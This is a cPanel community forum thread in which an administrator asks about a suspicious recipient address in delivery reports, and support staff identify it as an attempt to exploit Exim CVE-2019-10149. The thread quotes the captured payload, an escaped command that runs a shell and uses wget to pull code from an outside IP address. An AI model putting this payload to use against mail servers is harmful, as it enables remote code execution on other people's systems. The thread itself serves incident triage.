m.eid

Well-Known Member
Jun 4, 2014
55
7
83
Jordan
cPanel Access Level
Root Administrator
Twitter
Hi,
I've received three emails in delivery reports where receiver email is a script
Code:
root+${run{\x2fbin\x2fsh\t-c\t\x22wget\x20199.204.214.40\x2fsbz\x2f64.202.186.216\x22}}@hs01.domain.com
And the result column is "Permission denied: failed to chdir to /root"
Does this a risk where I can do something? Any recommendations?

*Note: We use ConfigServer scripts for exploitation and FrontEnd Mail Scanner where it topped it as High score Spam.
 

cPanelMichael

Technical Support Community Manager
Staff member
Apr 11, 2011
47,749
2,205
363
cPanel Access Level
DataCenter Provider
Twitter
Hello @m.eid,

That looks like an attempt to take advantage of the exploit noted in Exim CVE-2019-10149. If so, the attempts will fail as long as your server was updated (see the link in the previous sentence for more information) prior to the attempt.

If you're concerned your system may have been hacked, feel free to open a support ticket and we'll take a look.

Thank you.
 

cPanelMichael

Technical Support Community Manager
Staff member
Apr 11, 2011
47,749
2,205
363
cPanel Access Level
DataCenter Provider
Twitter
New I have version 80.0.20 which I think is updated Exim, so no risk from these kind of scripts?
Hello @m.eid,

Version 80.0.20 is protected against CVE-2019-10149 specifically. However, "no risk from these kind of scripts" is too broad a term when it comes to security. Here's a quote from our How To Clean A Hacked Server document that explains why:

To put it as succinctly as possible: without knowing every action that has ever taken place on a server, it is impossible to prove that the server is completely clean. While it is simple to show a compromised server, showing the opposite, for all intents and purposes, is not.
Thank you.